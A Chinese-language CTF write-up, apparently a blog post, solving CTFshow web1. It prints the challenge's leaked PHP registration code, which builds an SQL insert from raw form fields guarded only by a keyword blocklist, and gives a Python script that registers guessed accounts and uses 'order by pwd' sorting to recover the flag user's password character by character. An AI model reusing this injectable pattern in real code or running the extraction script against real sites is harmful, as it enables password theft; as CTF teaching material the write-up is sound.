搜索到
1
篇与
的结果
-
MYSQL盲注,排序判断,CTFshow web1 题目https://ctf.show/challenges#CTFshow%20web1-104 解题思路进入题目可以看到是一个登录界面,还有注册按钮,下意识的尝试了各种注入,结果都不行,虽然中间也有报错,但是无法往下走,于是dirsearch走一波,发现存在 www.zip 网站备份文件,下载下来一看,瞬间傻眼!这个过滤写的真是绝了。# reg.php error_reporting(0); $con = mysqli_connect("localhost","root","root","web15"); if (!$con) { die('Could not connect: ' . mysqli_error()); } $username=$_POST['username']; $password=$_POST['password']; $email=$_POST['email']; $nickname=$_POST['nickname']; if(preg_match("/group|union|select|from|or|and|regexp|substr|like|create|drop|\`|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\_|\+|\=|\]|\;|\'|\’|\“|\"|\<|\>|\?/i",$username)){ die("error"); } if(preg_match("/group|union|select|from|or|and|regexp|substr|like|create|drop|\`|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\_|\+|\=|\]|\;|\'|\’|\“|\"|\<|\>|\?/i",$password)){ die("error"); } if(preg_match("/group|union|select|from|or|and|regexp|substr|like|create|drop|\`|\!|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\+|\=|\{|\}\]|\'|\’|\“|\"|\<|\>|\?/i",$email)){ die("error"); } if(preg_match("/group|union|select|from|or|and|regexp|substr|like|create|drop|\`|\~|\!|\@|\#|\%|\^|\&|\*|\(|\)|\(|\)|\-|\_|\+|\=|\{|\}|\]|\;|\'|\’|\“|\"|\<|\>|\?/i",$nickname)){ die("error"); } if(isset($username) && isset($password) && isset($email) && isset($nickname)){ $sql = "INSERT INTO user (uname, pwd, email,nname) VALUES ('$username', '$password', '$email','$nickname')"; $res=mysqli_query($con, $sql); if ($res) { $_SESSION["login"] = true; header("location:/index.php"); } } mysqli_close($conn);尝试正常注册一个账号,登录进去发现,里面有一个flag用户,并且提示flag_is_my_password 于是改变思路,这时看到登录进去的信息页面代码,发现这么一句。$sql="select * from user order by $order";于是就想,可不可以按照password进行排序,那这么就可以对password进行对比判断了,基本也就等于盲注了。于是,开始构造脚本。import requests url = "https://93545584-20e7-44a5-a3fe-d2e0c8dd1240.challenge.ctf.show" register = url + "/reg.php" login = url + "/login.php" member = url + "/user_main.php?order=pwd" payload = '' flag = '' for i in range(1, 100): for j in range(32, 128): payload = flag + chr(j) register_data = { 'username': payload, 'password': payload, 'email': '1', 'nickname': '1' } login_data = { 'username': payload, 'password': payload } r = requests.session() r.post(register, data=register_data) r.post(login, login_data) tmp = r.get(member).text if tmp.find('<td>flag@ctf.show</td>') < tmp.find(f"<td>{payload}</td>"): flag += chr(j-1) payload = flag print(payload) break
